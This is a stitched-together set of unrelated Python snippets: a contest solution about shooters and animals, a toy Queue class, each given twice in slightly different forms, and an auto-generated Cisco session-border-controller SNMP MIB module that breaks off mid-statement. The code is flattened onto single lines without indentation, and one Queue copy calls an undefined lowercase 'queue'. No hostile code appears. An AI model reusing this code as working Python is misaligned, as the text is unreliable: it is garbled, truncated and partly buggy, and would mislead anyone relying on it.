m, n, l = map(int, input().split()) shooters = list(map(int, input().split())) animals = [] for _ in range(n): x, y = map(int, input().split()) if y <= l: animals.append((x, y)) shooters.sort() animals.sort(key=lambda axis: axis[0]) ans = 0 idx = 0 for i in range(len(animals)): left, right = idx, len(shooters)-1 mid = 0 while left <= right: mid = (left+right)//2 if shooters[mid] <= animals[i][0]: if len(shooters) - 1 == mid or shooters[mid+1] > animals[i][0]: break left = mid + 1 else: right = mid - 1 idx = mid if abs(animals[i][0] - shooters[mid]) + animals[i][1] <= l: ans += 1 elif len(shooters) > mid+1 and abs(animals[i][0] - shooters[mid+1]) + animals[i][1] <= l: ans += 1 print(ans)
(m, n, l) = map(int, input().split()) shooters = list(map(int, input().split())) animals = [] for _ in range(n): (x, y) = map(int, input().split()) if y <= l: animals.append((x, y)) shooters.sort() animals.sort(key=lambda axis: axis[0]) ans = 0 idx = 0 for i in range(len(animals)): (left, right) = (idx, len(shooters) - 1) mid = 0 while left <= right: mid = (left + right) // 2 if shooters[mid] <= animals[i][0]: if len(shooters) - 1 == mid or shooters[mid + 1] > animals[i][0]: break left = mid + 1 else: right = mid - 1 idx = mid if abs(animals[i][0] - shooters[mid]) + animals[i][1] <= l: ans += 1 elif len(shooters) > mid + 1 and abs(animals[i][0] - shooters[mid + 1]) + animals[i][1] <= l: ans += 1 print(ans)
class Queue(object): 'Queue' def __init__(self, build): self.data = [build] print("Stack :", self.data) def enqueue(self, new): self.data.append(new) print("Stack :", self.data) def dequeue(self): out = self.data.pop(0) print("Stack :", self.data) return out data = Queue(5) data.dequeue() data.enqueue(3) data.enqueue(23) data.enqueue(3) data.enqueue(234) data.dequeue()
class Queue(object): """Queue""" def __init__(self, build): self.data = [build] print('Stack :', self.data) def enqueue(self, new): self.data.append(new) print('Stack :', self.data) def dequeue(self): out = self.data.pop(0) print('Stack :', self.data) return out data = queue(5) data.dequeue() data.enqueue(3) data.enqueue(23) data.enqueue(3) data.enqueue(234) data.dequeue()
# # PySNMP MIB module CISCO-SESS-BORDER-CTRLR-STATS-MIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-SESS-BORDER-CTRLR-STATS-MIB # Produced by pysmi-0.3.4 at Mon Apr 29 17:55:14 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ValueSizeConstraint, ConstraintsUnion, ConstraintsIntersection, ValueRangeConstraint, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "ConstraintsIntersection", "ValueRangeConstraint", "SingleValueConstraint") csbCallStatsInstanceIndex, csbCallStatsServiceIndex, CiscoSbcPeriodicStatsInterval = mibBuilder.importSymbols("CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB", "csbCallStatsInstanceIndex", "csbCallStatsServiceIndex", "CiscoSbcPeriodicStatsInterval") ciscoMgmt, = mibBuilder.importSymbols("CISCO-SMI", "ciscoMgmt") SnmpAdminString, = mibBuilder.importSymbols("SNMP-FRAMEWORK-MIB", "SnmpAdminString") NotificationGroup, ModuleCompliance, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance", "ObjectGroup") MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, ModuleIdentity, iso, ObjectIdentity, Integer32, Gauge32, IpAddress, Bits, Counter32, Unsigned32, MibIdentifier, Counter64, NotificationType = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks", "ModuleIdentity", "iso", "ObjectIdentity", "Integer32", "Gauge32", "IpAddress", "Bits", "Counter32", "Unsigned32", "MibIdentifier", "Counter64", "NotificationType") TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString") ciscoSbcStatsMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 9, 757)) ciscoSbcStatsMIB.setRevisions(('2010-09-15 00:00',)) if mibBuilder.loadTexts: ciscoSbcStatsMIB.setLastUpdated('201009150000Z') if mibBuilder.loadTexts: ciscoSbcStatsMIB.setOrganization('Cisco Systems, Inc.') class CiscoSbcSIPMethod(TextualConvention, Integer32): status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14)) namedValues = NamedValues(("unknown", 1), ("ack", 2), ("bye", 3), ("cancel", 4), ("info", 5), ("invite", 6), ("message", 7), ("notify", 8), ("options", 9), ("prack", 10), ("refer", 11), ("register", 12), ("subscribe", 13), ("update", 14)) class CiscoSbcRadiusClientType(TextualConvention, Integer32): status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2)) namedValues = NamedValues(("authentication", 1), ("accounting", 2)) ciscoSbcStatsMIBNotifs = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 757, 0)) ciscoSbcStatsMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 757, 1)) ciscoSbcStatsMIBConform = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 757, 2)) csbRadiusStatsTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1), ) if mibBuilder.loadTexts: csbRadiusStatsTable.setStatus('current') csbRadiusStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1), ).setIndexNames((0, "CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB", "csbCallStatsInstanceIndex"), (0, "CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB", "csbCallStatsServiceIndex"), (0, "CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRadiusStatsEntIndex")) if mibBuilder.loadTexts: csbRadiusStatsEntry.setStatus('current') csbRadiusStatsEntIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 1), Unsigned32()) if mibBuilder.loadTexts: csbRadiusStatsEntIndex.setStatus('current') csbRadiusStatsClientName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 2), SnmpAdminString()).setMaxAccess("readonly") if mibBuilder.loadTexts: csbRadiusStatsClientName.setStatus('current') csbRadiusStatsClientType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 3), CiscoSbcRadiusClientType()).setMaxAccess("readonly") if mibBuilder.loadTexts: csbRadiusStatsClientType.setStatus('current') csbRadiusStatsSrvrName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 4), SnmpAdminString()).setMaxAccess("readonly") if mibBuilder.loadTexts: csbRadiusStatsSrvrName.setStatus('current') csbRadiusStatsAcsReqs = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 5), Counter64()).setUnits('packets').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRadiusStatsAcsReqs.setStatus('current') csbRadiusStatsAcsRtrns = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 6), Counter64()).setUnits('packets').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRadiusStatsAcsRtrns.setStatus('current') csbRadiusStatsAcsAccpts = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 7), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: csbRadiusStatsAcsAccpts.setStatus('current') csbRadiusStatsAcsRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 8), Counter64()).setUnits('packets').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRadiusStatsAcsRejects.setStatus('current') csbRadiusStatsAcsChalls = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 9), Counter64()).setUnits('packets').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRadiusStatsAcsChalls.setStatus('current') csbRadiusStatsActReqs = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 10), Counter64()).setUnits('packets').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRadiusStatsActReqs.setStatus('current') csbRadiusStatsActRetrans = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 11), Counter64()).setUnits('packets').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRadiusStatsActRetrans.setStatus('current') csbRadiusStatsActRsps = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 12), Counter64()).setUnits('packets').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRadiusStatsActRsps.setStatus('current') csbRadiusStatsMalformedRsps = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 13), Counter64()).setUnits('packets').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRadiusStatsMalformedRsps.setStatus('current') csbRadiusStatsBadAuths = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 14), Counter64()).setUnits('packets').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRadiusStatsBadAuths.setStatus('current') csbRadiusStatsPending = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 15), Gauge32()).setUnits('packets').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRadiusStatsPending.setStatus('current') csbRadiusStatsTimeouts = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 16), Counter64()).setUnits('packets').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRadiusStatsTimeouts.setStatus('current') csbRadiusStatsUnknownType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 17), Counter64()).setUnits('packets').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRadiusStatsUnknownType.setStatus('current') csbRadiusStatsDropped = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 18), Counter64()).setUnits('packets').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRadiusStatsDropped.setStatus('current') csbRfBillRealmStatsTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2), ) if mibBuilder.loadTexts: csbRfBillRealmStatsTable.setStatus('current') csbRfBillRealmStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1), ).setIndexNames((0, "CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB", "csbCallStatsInstanceIndex"), (0, "CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB", "csbCallStatsServiceIndex"), (0, "CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRfBillRealmStatsIndex"), (0, "CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRfBillRealmStatsRealmName")) if mibBuilder.loadTexts: csbRfBillRealmStatsEntry.setStatus('current') csbRfBillRealmStatsIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 31))) if mibBuilder.loadTexts: csbRfBillRealmStatsIndex.setStatus('current') csbRfBillRealmStatsRealmName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 2), SnmpAdminString()).setMaxAccess("readonly") if mibBuilder.loadTexts: csbRfBillRealmStatsRealmName.setStatus('current') csbRfBillRealmStatsTotalStartAcrs = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 3), Unsigned32()).setUnits('ACRs').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRfBillRealmStatsTotalStartAcrs.setStatus('current') csbRfBillRealmStatsTotalInterimAcrs = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 4), Unsigned32()).setUnits('ACRs').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRfBillRealmStatsTotalInterimAcrs.setStatus('current') csbRfBillRealmStatsTotalStopAcrs = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 5), Unsigned32()).setUnits('ACRs').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRfBillRealmStatsTotalStopAcrs.setStatus('current') csbRfBillRealmStatsTotalEventAcrs = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 6), Unsigned32()).setUnits('ACRs').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRfBillRealmStatsTotalEventAcrs.setStatus('current') csbRfBillRealmStatsSuccStartAcrs = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 7), Unsigned32()).setUnits('ACRs').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRfBillRealmStatsSuccStartAcrs.setStatus('current') csbRfBillRealmStatsSuccInterimAcrs = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 8), Unsigned32()).setUnits('ACRs').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRfBillRealmStatsSuccInterimAcrs.setStatus('current') csbRfBillRealmStatsSuccStopAcrs = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 9), Unsigned32()).setUnits('ACRs').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRfBillRealmStatsSuccStopAcrs.setStatus('current') csbRfBillRealmStatsSuccEventAcrs = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 10), Unsigned32()).setUnits('ACRs').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRfBillRealmStatsSuccEventAcrs.setStatus('current') csbRfBillRealmStatsFailStartAcrs = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 11), Unsigned32()).setUnits('ACRs').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRfBillRealmStatsFailStartAcrs.setStatus('current') csbRfBillRealmStatsFailInterimAcrs = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 12), Unsigned32()).setUnits('ACRs').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRfBillRealmStatsFailInterimAcrs.setStatus('current') csbRfBillRealmStatsFailStopAcrs = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 13), Unsigned32()).setUnits('ACRs').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRfBillRealmStatsFailStopAcrs.setStatus('current') csbRfBillRealmStatsFailEventAcrs = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 14), Unsigned32()).setUnits('ACRs').setMaxAccess("readonly") if mibBuilder.loadTexts: csbRfBillRealmStatsFailEventAcrs.setStatus('current') csbSIPMthdCurrentStatsTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3), ) if mibBuilder.loadTexts: csbSIPMthdCurrentStatsTable.setStatus('current') csbSIPMthdCurrentStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1), ).setIndexNames((0, "CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB", "csbCallStatsInstanceIndex"), (0, "CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB", "csbCallStatsServiceIndex"), (0, "CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdCurrentStatsAdjName"), (0, "CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdCurrentStatsMethod"), (0, "CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdCurrentStatsInterval")) if mibBuilder.loadTexts: csbSIPMthdCurrentStatsEntry.setStatus('current') csbSIPMthdCurrentStatsAdjName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 1), SnmpAdminString()).setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdCurrentStatsAdjName.setStatus('current') csbSIPMthdCurrentStatsMethod = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 2), CiscoSbcSIPMethod()) if mibBuilder.loadTexts: csbSIPMthdCurrentStatsMethod.setStatus('current') csbSIPMthdCurrentStatsInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 3), CiscoSbcPeriodicStatsInterval()) if mibBuilder.loadTexts: csbSIPMthdCurrentStatsInterval.setStatus('current') csbSIPMthdCurrentStatsMethodName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 4), SnmpAdminString()).setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdCurrentStatsMethodName.setStatus('current') csbSIPMthdCurrentStatsReqIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 5), Gauge32()).setUnits('requests').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdCurrentStatsReqIn.setStatus('current') csbSIPMthdCurrentStatsReqOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 6), Gauge32()).setUnits('requests').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdCurrentStatsReqOut.setStatus('current') csbSIPMthdCurrentStatsResp1xxIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 7), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp1xxIn.setStatus('current') csbSIPMthdCurrentStatsResp1xxOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 8), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp1xxOut.setStatus('current') csbSIPMthdCurrentStatsResp2xxIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 9), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp2xxIn.setStatus('current') csbSIPMthdCurrentStatsResp2xxOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 10), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp2xxOut.setStatus('current') csbSIPMthdCurrentStatsResp3xxIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 11), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp3xxIn.setStatus('current') csbSIPMthdCurrentStatsResp3xxOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 12), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp3xxOut.setStatus('current') csbSIPMthdCurrentStatsResp4xxIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 13), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp4xxIn.setStatus('current') csbSIPMthdCurrentStatsResp4xxOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 14), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp4xxOut.setStatus('current') csbSIPMthdCurrentStatsResp5xxIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 15), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp5xxIn.setStatus('current') csbSIPMthdCurrentStatsResp5xxOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 16), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp5xxOut.setStatus('current') csbSIPMthdCurrentStatsResp6xxIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 17), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp6xxIn.setStatus('current') csbSIPMthdCurrentStatsResp6xxOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 18), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp6xxOut.setStatus('current') csbSIPMthdHistoryStatsTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4), ) if mibBuilder.loadTexts: csbSIPMthdHistoryStatsTable.setStatus('current') csbSIPMthdHistoryStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1), ).setIndexNames((0, "CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB", "csbCallStatsInstanceIndex"), (0, "CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB", "csbCallStatsServiceIndex"), (0, "CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdHistoryStatsAdjName"), (0, "CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdHistoryStatsMethod"), (0, "CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdHistoryStatsInterval")) if mibBuilder.loadTexts: csbSIPMthdHistoryStatsEntry.setStatus('current') csbSIPMthdHistoryStatsAdjName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 1), SnmpAdminString()).setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdHistoryStatsAdjName.setStatus('current') csbSIPMthdHistoryStatsMethod = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 2), CiscoSbcSIPMethod()) if mibBuilder.loadTexts: csbSIPMthdHistoryStatsMethod.setStatus('current') csbSIPMthdHistoryStatsInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 3), CiscoSbcPeriodicStatsInterval()) if mibBuilder.loadTexts: csbSIPMthdHistoryStatsInterval.setStatus('current') csbSIPMthdHistoryStatsMethodName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 4), SnmpAdminString()).setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdHistoryStatsMethodName.setStatus('current') csbSIPMthdHistoryStatsReqIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 5), Gauge32()).setUnits('requests').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdHistoryStatsReqIn.setStatus('current') csbSIPMthdHistoryStatsReqOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 6), Gauge32()).setUnits('requests').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdHistoryStatsReqOut.setStatus('current') csbSIPMthdHistoryStatsResp1xxIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 7), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp1xxIn.setStatus('current') csbSIPMthdHistoryStatsResp1xxOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 8), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp1xxOut.setStatus('current') csbSIPMthdHistoryStatsResp2xxIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 9), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp2xxIn.setStatus('current') csbSIPMthdHistoryStatsResp2xxOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 10), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp2xxOut.setStatus('current') csbSIPMthdHistoryStatsResp3xxIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 11), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp3xxIn.setStatus('current') csbSIPMthdHistoryStatsResp3xxOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 12), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp3xxOut.setStatus('current') csbSIPMthdHistoryStatsResp4xxIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 13), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp4xxIn.setStatus('current') csbSIPMthdHistoryStatsResp4xxOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 14), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp4xxOut.setStatus('current') csbSIPMthdHistoryStatsResp5xxIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 15), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp5xxIn.setStatus('current') csbSIPMthdHistoryStatsResp5xxOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 16), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp5xxOut.setStatus('current') csbSIPMthdHistoryStatsResp6xxIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 17), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp6xxIn.setStatus('current') csbSIPMthdHistoryStatsResp6xxOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 18), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp6xxOut.setStatus('current') csbSIPMthdRCCurrentStatsTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 5), ) if mibBuilder.loadTexts: csbSIPMthdRCCurrentStatsTable.setStatus('current') csbSIPMthdRCCurrentStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 5, 1), ).setIndexNames((0, "CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB", "csbCallStatsInstanceIndex"), (0, "CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB", "csbCallStatsServiceIndex"), (0, "CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdRCCurrentStatsAdjName"), (0, "CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdRCCurrentStatsMethod"), (0, "CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdRCCurrentStatsRespCode"), (0, "CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdRCCurrentStatsInterval")) if mibBuilder.loadTexts: csbSIPMthdRCCurrentStatsEntry.setStatus('current') csbSIPMthdRCCurrentStatsAdjName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 5, 1, 1), SnmpAdminString()).setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdRCCurrentStatsAdjName.setStatus('current') csbSIPMthdRCCurrentStatsMethod = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 5, 1, 2), CiscoSbcSIPMethod()) if mibBuilder.loadTexts: csbSIPMthdRCCurrentStatsMethod.setStatus('current') csbSIPMthdRCCurrentStatsRespCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 5, 1, 3), Unsigned32()) if mibBuilder.loadTexts: csbSIPMthdRCCurrentStatsRespCode.setStatus('current') csbSIPMthdRCCurrentStatsInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 5, 1, 4), CiscoSbcPeriodicStatsInterval()) if mibBuilder.loadTexts: csbSIPMthdRCCurrentStatsInterval.setStatus('current') csbSIPMthdRCCurrentStatsMethodName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 5, 1, 5), SnmpAdminString()).setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdRCCurrentStatsMethodName.setStatus('current') csbSIPMthdRCCurrentStatsRespIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 5, 1, 6), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdRCCurrentStatsRespIn.setStatus('current') csbSIPMthdRCCurrentStatsRespOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 5, 1, 7), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdRCCurrentStatsRespOut.setStatus('current') csbSIPMthdRCHistoryStatsTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 6), ) if mibBuilder.loadTexts: 